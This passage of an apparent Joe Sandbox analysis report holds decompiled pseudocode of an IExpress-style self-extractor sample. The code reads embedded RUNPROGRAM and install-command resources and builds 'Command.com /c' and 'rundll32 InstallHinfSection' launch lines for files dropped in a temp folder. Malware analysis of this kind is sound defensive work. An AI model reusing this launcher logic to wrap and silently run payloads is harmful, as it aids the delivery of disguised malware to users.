                                                                        			E003D6952(CHAR* __ecx) {
                                                                        				long _v8;
                                                                        				long _v12;
                                                                        				long _v16;
                                                                        				char _v20;
                                                                        				int _t22;
                                                                        
                                                                        				_t22 = 0;
                                                                        				_v12 = 0;
                                                                        				_v8 = 0;
                                                                        				_v20 = 0;
                                                                        				_v16 = 0;
                                                                        				if( *__ecx != 0) {
                                                                        					_t6 =  &_v20; // 0x3d5760
                                                                        					if(GetDiskFreeSpaceA(__ecx,  &_v12,  &_v8, _t6,  &_v16) != 0) {
                                                                        						_t22 = MulDiv(_v8 * _v12, _v16, 0x400);
                                                                        					}
                                                                        				}
                                                                        				return _t22;
                                                                        			}









                                                                        APIs
                                                                        • GetDiskFreeSpaceA.KERNEL32(0000005A,?,?,`W=,?,00000000,003D5760,?,A:\), ref: 003D697F
                                                                        • MulDiv.KERNEL32(?,?,00000400), ref: 003D6999
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: DiskFreeSpace
                                                                        • String ID: `W=
                                                                        • API String ID: 1705453755-436508080
                                                                        • Opcode ID: 26ab0ccefc75b0e1d8dc3109833aa4c678be90649123ba54b1665fe8fec38ca7
                                                                        • Instruction ID: 190f7fb84efa5adf1fd67542a0b1f4e727004c72e0a65ed459a99e93a161611e
                                                                        • Opcode Fuzzy Hash: 26ab0ccefc75b0e1d8dc3109833aa4c678be90649123ba54b1665fe8fec38ca7
                                                                        • Instruction Fuzzy Hash: 0EF0E7B6D01228BBCB12DFE89D45ADEBBBCEB48700F104197A510E2240D6719A008B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:26.9%
                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:969
                                                                        Total number of Limit Nodes:42
3274->3277 3275->3277 3278 f33149 GetDesktopWindow 3276->3278 3279 f3311d 3276->3279 3281 f343d0 11 API calls 3278->3281 3279->3277 3280 f33138 EndDialog 3279->3280 3280->3277 3282 f3315d 6 API calls 3281->3282 3282->3277 3283 f34200 3284 f3420b SendMessageA 3283->3284 3285 f3421e 3283->3285 3284->3285

Callgraph

[Figure: function call graph for the analyzed module. Legend: Executed; Not Executed; Opacity -> Relevance; Disassembly available.]

Control-flow Graph

[Figure: control-flow graph for function 00F33BA2. Legend: Executed; Not Executed.]
                                                                        C-Code - Quality: 82%
                                                                        			E00F33BA2() {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				short _v300;
                                                                        				intOrPtr _v304;
                                                                        				void _v348;
                                                                        				char _v352;
                                                                        				intOrPtr _v356;
                                                                        				signed int _v360;
                                                                        				short _v364;
                                                                        				char* _v368;
                                                                        				intOrPtr _v372;
                                                                        				void* _v376;
                                                                        				intOrPtr _v380;
                                                                        				char _v384;
                                                                        				signed int _v388;
                                                                        				intOrPtr _v392;
                                                                        				signed int _v396;
                                                                        				signed int _v400;
                                                                        				signed int _v404;
                                                                        				void* _v408;
                                                                        				void* _v424;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t69;
                                                                        				signed int _t76;
                                                                        				void* _t77;
                                                                        				signed int _t79;
                                                                        				short _t96;
                                                                        				signed int _t97;
                                                                        				intOrPtr _t98;
                                                                        				signed int _t101;
                                                                        				signed int _t104;
                                                                        				signed int _t108;
                                                                        				int _t112;
                                                                        				void* _t115;
                                                                        				signed char _t118;
                                                                        				void* _t125;
                                                                        				signed int _t127;
                                                                        				void* _t128;
                                                                        				struct HINSTANCE__* _t129;
                                                                        				void* _t130;
                                                                        				short _t137;
                                                                        				char* _t140;
                                                                        				signed char _t144;
                                                                        				signed char _t145;
                                                                        				signed int _t149;
                                                                        				void* _t150;
                                                                        				void* _t151;
                                                                        				signed int _t153;
                                                                        				void* _t155;
                                                                        				void* _t156;
                                                                        				signed int _t157;
                                                                        				signed int _t162;
                                                                        				signed int _t164;
                                                                        				void* _t165;
                                                                        
                                                                        				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                        				_t69 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t69 ^ _t164;
                                                                        				_t153 = 0;
                                                                        				 *0xf39124 =  *0xf39124 & 0;
                                                                        				_t149 = 0;
                                                                        				_v388 = 0;
                                                                        				_v384 = 0;
                                                                        				_t165 =  *0xf38a28 - _t153; // 0x0
                                                                        				if(_t165 != 0) {
                                                                        					L3:
                                                                        					_t127 = 0;
                                                                        					_v392 = 0;
                                                                        					while(1) {
                                                                        						_v400 = _v400 & 0x00000000;
                                                                        						memset( &_v348, 0, 0x44);
                                                                        						_t164 = _t164 + 0xc;
                                                                        						_v348 = 0x44;
                                                                        						if( *0xf38c42 != 0) {
                                                                        							goto L26;
                                                                        						}
                                                                        						_t146 =  &_v396;
                                                                        						_t115 = E00F3468F("SHOWWINDOW",  &_v396, 4);
                                                                        						if(_t115 == 0 || _t115 > 4) {
                                                                        							L25:
                                                                        							_t146 = 0x4b1;
                                                                        							E00F344B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        							 *0xf39124 = 0x80070714;
                                                                        							goto L62;
                                                                        						} else {
                                                                        							if(_v396 != 1) {
                                                                        								__eflags = _v396 - 2;
                                                                        								if(_v396 != 2) {
                                                                        									_t137 = 3;
                                                                        									__eflags = _v396 - _t137;
                                                                        									if(_v396 == _t137) {
                                                                        										_v304 = 1;
                                                                        										_v300 = _t137;
                                                                        									}
                                                                        									goto L14;
                                                                        								}
                                                                        								_push(6);
                                                                        								_v304 = 1;
                                                                        								_pop(0);
                                                                        								goto L11;
                                                                        							} else {
                                                                        								_v304 = 1;
                                                                        								L11:
                                                                        								_v300 = 0;
                                                                        								L14:
                                                                        								if(_t127 != 0) {
                                                                        									L27:
                                                                        									_t155 = 1;
                                                                        									__eflags = _t127 - 1;
                                                                        									if(_t127 != 1) {
                                                                        										L31:
                                                                        										_t132 =  &_v280;
                                                                        										_t76 = E00F31AE8( &_v280,  &_v408,  &_v404); // executed
                                                                        										__eflags = _t76;
                                                                        										if(_t76 == 0) {
                                                                        											L62:
                                                                        											_t77 = 0;
                                                                        											L63:
                                                                        											_pop(_t150);
                                                                        											_pop(_t156);
                                                                        											_pop(_t128);
                                                                        											return E00F36CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                        										}
                                                                        										_t157 = _v404;
                                                                        										__eflags = _t149;
                                                                        										if(_t149 != 0) {
                                                                        											L37:
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												L57:
                                                                        												_t151 = _v408;
                                                                        												_t146 =  &_v352;
                                                                        												_t130 = _t151; // executed
                                                                        												_t79 = E00F33FEF(_t130,  &_v352); // executed
                                                                        												__eflags = _t79;
                                                                        												if(_t79 == 0) {
                                                                        													L61:
                                                                        													LocalFree(_t151);
                                                                        													goto L62;
                                                                        												}
                                                                        												L58:
                                                                        												LocalFree(_t151);
                                                                        												_t127 = _t127 + 1;
                                                                        												_v396 = _t127;
                                                                        												__eflags = _t127 - 2;
                                                                        												if(_t127 >= 2) {
                                                                        													_t155 = 1;
                                                                        													__eflags = 1;
                                                                        													L69:
                                                                        													__eflags =  *0xf38580;
                                                                        													if( *0xf38580 != 0) {
                                                                        														E00F32267();
                                                                        													}
                                                                        													_t77 = _t155;
                                                                        													goto L63;
                                                                        												}
                                                                        												_t153 = _v392;
                                                                        												_t149 = _v388;
                                                                        												continue;
                                                                        											}
                                                                        											L38:
                                                                        											__eflags =  *0xf38180;
                                                                        											if( *0xf38180 == 0) {
                                                                        												_t146 = 0x4c7;
                                                                        												E00F344B9(0, 0x4c7, 0, 0, 0x10, 0);
                                                                        												LocalFree(_v424);
                                                                        												 *0xf39124 = 0x8007042b;
                                                                        												goto L62;
                                                                        											}
                                                                        											__eflags = _t157;
                                                                        											if(_t157 == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											__eflags =  *0xf39a34 & 0x00000004;
                                                                        											if(__eflags == 0) {
                                                                        												goto L57;
                                                                        											}
                                                                        											_t129 = E00F36495(_t127, _t132, _t157, __eflags);
                                                                        											__eflags = _t129;
                                                                        											if(_t129 == 0) {
                                                                        												_t146 = 0x4c8;
                                                                        												E00F344B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                        												L65:
                                                                        												LocalFree(_v408);
                                                                        												 *0xf39124 = E00F36285();
                                                                        												goto L62;
                                                                        											}
                                                                        											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                        											_v404 = _t146;
                                                                        											__eflags = _t146;
                                                                        											if(_t146 == 0) {
                                                                        												_t146 = 0x4c9;
                                                                        												__eflags = 0;
                                                                        												E00F344B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                        												FreeLibrary(_t129);
                                                                        												goto L65;
                                                                        											}
                                                                        											__eflags =  *0xf38a30;
                                                                        											_t151 = _v408;
                                                                        											_v384 = 0;
                                                                        											_v368 =  &_v280;
                                                                        											_t96 =  *0xf39a40; // 0x3
                                                                        											_v364 = _t96;
                                                                        											_t97 =  *0xf38a38 & 0x0000ffff;
                                                                        											_v380 = 0xf39154;
                                                                        											_v376 = _t151;
                                                                        											_v372 = 0xf391e4;
                                                                        											_v360 = _t97;
                                                                        											if( *0xf38a30 != 0) {
                                                                        												_t97 = _t97 | 0x00010000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t144 =  *0xf39a34; // 0x1
                                                                        											__eflags = _t144 & 0x00000008;
                                                                        											if((_t144 & 0x00000008) != 0) {
                                                                        												_t97 = _t97 | 0x00020000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t144 & 0x00000010;
                                                                        											if((_t144 & 0x00000010) != 0) {
                                                                        												_t97 = _t97 | 0x00040000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											_t145 =  *0xf38d48; // 0x0
                                                                        											__eflags = _t145 & 0x00000040;
                                                                        											if((_t145 & 0x00000040) != 0) {
                                                                        												_t97 = _t97 | 0x00080000;
                                                                        												__eflags = _t97;
                                                                        												_v360 = _t97;
                                                                        											}
                                                                        											__eflags = _t145;
                                                                        											if(_t145 < 0) {
                                                                        												_t104 = _t97 | 0x00100000;
                                                                        												__eflags = _t104;
                                                                        												_v360 = _t104;
                                                                        											}
                                                                        											_t98 =  *0xf39a38; // 0x0
                                                                        											_v356 = _t98;
                                                                        											_t130 = _t146;
                                                                        											 *0xf3a288( &_v384);
                                                                        											_t101 = _v404();
                                                                        											__eflags = _t164 - _t164;
                                                                        											if(_t164 != _t164) {
                                                                        												_t130 = 4;
                                                                        												asm("int 0x29");
                                                                        											}
                                                                        											 *0xf39124 = _t101;
                                                                        											_push(_t129);
                                                                        											__eflags = _t101;
                                                                        											if(_t101 < 0) {
                                                                        												FreeLibrary();
                                                                        												goto L61;
                                                                        											} else {
                                                                        												FreeLibrary();
                                                                        												_t127 = _v400;
                                                                        												goto L58;
                                                                        											}
                                                                        										}
                                                                        										__eflags =  *0xf39a40 - 1; // 0x3
                                                                        										if(__eflags == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags =  *0xf38a20;
                                                                        										if( *0xf38a20 == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        										__eflags = _t157;
                                                                        										if(_t157 != 0) {
                                                                        											goto L38;
                                                                        										}
                                                                        										_v388 = 1;
                                                                        										E00F3202A(_t146); // executed
                                                                        										goto L37;
                                                                        									}
                                                                        									_t146 =  &_v280;
                                                                        									_t108 = E00F3468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                        									__eflags = _t108;
                                                                        									if(_t108 == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									__eflags =  *0xf38c42;
                                                                        									if( *0xf38c42 != 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                        									__eflags = _t112 == 0;
                                                                        									if(_t112 == 0) {
                                                                        										goto L69;
                                                                        									}
                                                                        									goto L31;
                                                                        								}
                                                                        								_t118 =  *0xf38a38; // 0x0
                                                                        								if(_t118 == 0) {
                                                                        									L23:
                                                                        									if(_t153 != 0) {
                                                                        										goto L31;
                                                                        									}
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F3468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                        										goto L27;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        								if((_t118 & 0x00000001) == 0) {
                                                                        									__eflags = _t118 & 0x00000002;
                                                                        									if((_t118 & 0x00000002) == 0) {
                                                                        										goto L62;
                                                                        									}
                                                                        									_t140 = "USRQCMD";
                                                                        									L20:
                                                                        									_t146 =  &_v276;
                                                                        									if(E00F3468F(_t140,  &_v276, 0x104) == 0) {
                                                                        										goto L25;
                                                                        									}
                                                                        									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                        										_t153 = 1;
                                                                        										_v388 = 1;
                                                                        									}
                                                                        									goto L23;
                                                                        								}
                                                                        								_t140 = "ADMQCMD";
                                                                        								goto L20;
                                                                        							}
                                                                        						}
                                                                        						L26:
                                                                        						_push(_t130);
                                                                        						_t146 = 0x104;
                                                                        						E00F31781( &_v276, 0x104, _t130, 0xf38c42);
                                                                        						goto L27;
                                                                        					}
                                                                        				}
                                                                        				_t130 = "REBOOT";
                                                                        				_t125 = E00F3468F(_t130, 0xf39a2c, 4);
                                                                        				if(_t125 == 0 || _t125 > 4) {
                                                                        					goto L25;
                                                                        				} else {
                                                                        					goto L3;
                                                                        				}
                                                                        			}
                                                                        0x00f33c56
                                                                        0x00f33d35
                                                                        0x00f33d35
                                                                        0x00f33d3c
                                                                        0x00f33d48
                                                                        0x00000000
                                                                        0x00f33d48
                                                                        0x00f33c03
                                                                        0x00f33be2
                                                                        0x00f33be7
                                                                        0x00f33bee
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • memset.MSVCRT ref: 00F33C11
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00F33CDC
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346A0
                                                                          • Part of subcall function 00F3468F: SizeofResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346A9
                                                                          • Part of subcall function 00F3468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00F346C3
                                                                          • Part of subcall function 00F3468F: LoadResource.KERNEL32(00000000,00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346CC
                                                                          • Part of subcall function 00F3468F: LockResource.KERNEL32(00000000,?,00F32D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346D3
                                                                          • Part of subcall function 00F3468F: memcpy_s.MSVCRT ref: 00F346E5
                                                                          • Part of subcall function 00F3468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00F346EF
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00F38C42), ref: 00F33D8F
                                                                        • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00F33E26
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F38C42), ref: 00F33EFF
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F38C42), ref: 00F33F1F
                                                                        • FreeLibrary.KERNEL32(00000000,?,00F38C42), ref: 00F33F40
                                                                        • LocalFree.KERNEL32(?,?,?,?,00F38C42), ref: 00F33F47
                                                                        • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00F38C42), ref: 00F33F76
                                                                        • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00F38C42), ref: 00F33F80
                                                                        • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00F38C42), ref: 00F33FC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                        • String ID: <None>$ADMQCMD$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$lenta
                                                                        • API String ID: 1032054927-1033524935
                                                                        • Opcode ID: 07127e23abc38d29e47377d1be1b481afdf47c495102e71f011d27b0ff362593
                                                                        • Instruction ID: 1e9235beddf59dc892ed890a0f012e44dc5f74d0aaa98c0d48332ce491eb1575
                                                                        • Opcode Fuzzy Hash: 07127e23abc38d29e47377d1be1b481afdf47c495102e71f011d27b0ff362593
                                                                        • Instruction Fuzzy Hash: 3AB122709083059BD724DF34CC45B6B76E5EB84770F00092DFA85D62A1EBB8CA45FB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        C-Code - Quality: 82%
                                                                        			E00F31AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v527;
                                                                        				char _v528;
                                                                        				char _v1552;
                                                                        				CHAR* _v1556;
                                                                        				int* _v1560;
                                                                        				CHAR** _v1564;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t48;
                                                                        				CHAR* _t53;
                                                                        				CHAR* _t54;
                                                                        				char* _t57;
                                                                        				char* _t58;
                                                                        				CHAR* _t60;
                                                                        				void* _t62;
                                                                        				signed char _t65;
                                                                        				intOrPtr _t76;
                                                                        				intOrPtr _t77;
                                                                        				unsigned int _t85;
                                                                        				CHAR* _t90;
                                                                        				CHAR* _t92;
                                                                        				char _t105;
                                                                        				char _t106;
                                                                        				CHAR** _t111;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr* _t125;
                                                                        				void* _t126;
                                                                        				CHAR* _t132;
                                                                        				CHAR* _t135;
                                                                        				void* _t138;
                                                                        				void* _t139;
                                                                        				void* _t145;
                                                                        				intOrPtr* _t146;
                                                                        				char* _t148;
                                                                        				CHAR* _t151;
                                                                        				void* _t152;
                                                                        				CHAR* _t155;
                                                                        				CHAR* _t156;
                                                                        				void* _t157;
                                                                        				signed int _t158;
                                                                        
                                                                        				_t48 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t48 ^ _t158;
                                                                        				_t108 = __ecx;
                                                                        				_v1564 = _a4;
                                                                        				_v1560 = _a8;
                                                                        				E00F31680( &_v528, 0x104, __ecx);
                                                                        				if(_v528 != 0x22) {
                                                                        					_t135 = " ";
                                                                        					_t53 =  &_v528;
                                                                        				} else {
                                                                        					_t135 = "\"";
                                                                        					_t53 =  &_v527;
                                                                        				}
                                                                        				_t111 =  &_v1556;
                                                                        				_v1556 = _t53;
                                                                        				_t54 = E00F31A84(_t111, _t135);
                                                                        				_t156 = _v1556;
                                                                        				_t151 = _t54;
                                                                        				if(_t156 == 0) {
                                                                        					L12:
                                                                        					_push(_t111);
                                                                        					E00F31781( &_v268, 0x104, _t111, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        					E00F3658A( &_v268, 0x104, _t156);
                                                                        					goto L13;
                                                                        				} else {
                                                                        					_t132 = _t156;
                                                                        					_t148 =  &(_t132[1]);
                                                                        					do {
                                                                        						_t105 =  *_t132;
                                                                        						_t132 =  &(_t132[1]);
                                                                        					} while (_t105 != 0);
                                                                        					_t111 = _t132 - _t148;
                                                                        					if(_t111 < 3) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t106 = _t156[1];
                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                        							goto L12;
                                                                        						} else {
                                                                        							goto L11;
                                                                        						}
                                                                        					} else {
                                                                        						L11:
                                                                        						E00F31680( &_v268, 0x104, _t156);
                                                                        						L13:
                                                                        						_t138 = 0x2e;
                                                                        						_t57 = E00F366C8(_t156, _t138);
                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                        							_t139 = 0x2e;
                                                                        							_t115 = _t156;
                                                                        							_t58 = E00F366C8(_t115, _t139);
                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                        								if(_t156 == 0) {
                                                                        									goto L43;
                                                                        								}
                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                        									E00F31680( &_v1552, 0x400, _t108);
                                                                        								} else {
                                                                        									_push(_t115);
                                                                        									_t108 = 0x400;
                                                                        									E00F31781( &_v1552, 0x400, _t115,  &_v268);
                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                        										E00F316B3( &_v1552, 0x400, " ");
                                                                        										E00F316B3( &_v1552, 0x400, _t151);
                                                                        									}
                                                                        								}
                                                                        								_t140 = _t156;
                                                                        								 *_t156 = 0;
                                                                        								E00F32AAC( &_v1552, _t156, _t156);
                                                                        								goto L53;
                                                                        							} else {
                                                                        								_t108 = "Command.com /c %s";
                                                                        								_t125 = "Command.com /c %s";
                                                                        								_t145 = _t125 + 1;
                                                                        								do {
                                                                        									_t76 =  *_t125;
                                                                        									_t125 = _t125 + 1;
                                                                        								} while (_t76 != 0);
                                                                        								_t126 = _t125 - _t145;
                                                                        								_t146 =  &_v268;
                                                                        								_t157 = _t146 + 1;
                                                                        								do {
                                                                        									_t77 =  *_t146;
                                                                        									_t146 = _t146 + 1;
                                                                        								} while (_t77 != 0);
                                                                        								_t140 = _t146 - _t157;
                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                        								if(_t156 != 0) {
                                                                        									E00F3171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                        									goto L53;
                                                                        								}
                                                                        								goto L43;
                                                                        							}
                                                                        						} else {
                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                        								_t140 = 0x525;
                                                                        								_push(0);
                                                                        								_push(0x10);
                                                                        								_push(0);
                                                                        								_t60 =  &_v268;
                                                                        								goto L35;
                                                                        							} else {
                                                                        								_t140 = "[";
                                                                        								_v1556 = _t151;
                                                                        								_t90 = E00F31A84( &_v1556, "[");
                                                                        								if(_t90 != 0) {
                                                                        									if( *_t90 != 0) {
                                                                        										_v1556 = _t90;
                                                                        									}
                                                                        									_t140 = "]";
                                                                        									E00F31A84( &_v1556, "]");
                                                                        								}
                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                        								if(_t156 == 0) {
                                                                        									L43:
                                                                        									_t60 = 0;
                                                                        									_t140 = 0x4b5;
                                                                        									_push(0);
                                                                        									_push(0x10);
                                                                        									_push(0);
                                                                        									L35:
                                                                        									_push(_t60);
                                                                        									E00F344B9(0, _t140);
                                                                        									_t62 = 0;
                                                                        									goto L54;
                                                                        								} else {
                                                                        									_t155 = _v1556;
                                                                        									_t92 = _t155;
                                                                        									if( *_t155 == 0) {
                                                                        										_t92 = "DefaultInstall";
                                                                        									}
                                                                        									 *0xf39120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                        									 *_v1560 = 1;
                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xf31140, _t156, 8,  &_v268) == 0) {
                                                                        										 *0xf39a34 =  *0xf39a34 & 0xfffffffb;
                                                                        										if( *0xf39a40 != 0) {
                                                                        											_t108 = "setupapi.dll";
                                                                        										} else {
                                                                        											_t108 = "setupx.dll";
                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                        										}
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										_push( &_v268);
                                                                        										_push(_t155);
                                                                        										E00F3171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                        									} else {
                                                                        										 *0xf39a34 =  *0xf39a34 | 0x00000004;
                                                                        										if( *_t155 == 0) {
                                                                        											_t155 = "DefaultInstall";
                                                                        										}
                                                                        										E00F31680(_t108, 0x104, _t155);
                                                                        										_t140 = 0x200;
                                                                        										E00F31680(_t156, 0x200,  &_v268);
                                                                        									}
                                                                        									L53:
                                                                        									_t62 = 1;
                                                                        									 *_v1564 = _t156;
                                                                        									L54:
                                                                        									_pop(_t152);
                                                                        									return E00F36CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}















































                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F31BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F31C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00F31C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F31140,00000000,00000008,?), ref: 00F31CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 00F31D1B
                                                                          • Part of subcall function 00F344B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F34518
                                                                          • Part of subcall function 00F344B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00F34554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-3964152161
                                                                        • Opcode ID: 4f61784907ab5529a9bbe6f5a6cf286b52259734eb9d40cc78723bcebf600c1a
                                                                        • Instruction ID: 0e3030ff74f57f71bb16d0ff7dac3a0ec21a733492491797522e187f12132c8b
                                                                        • Opcode Fuzzy Hash: 4f61784907ab5529a9bbe6f5a6cf286b52259734eb9d40cc78723bcebf600c1a
                                                                        • Instruction Fuzzy Hash: C2A14BB1E002186BEF20AB24CC45FEA7769FB91330F144295F595A32D1DBB49EC6EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
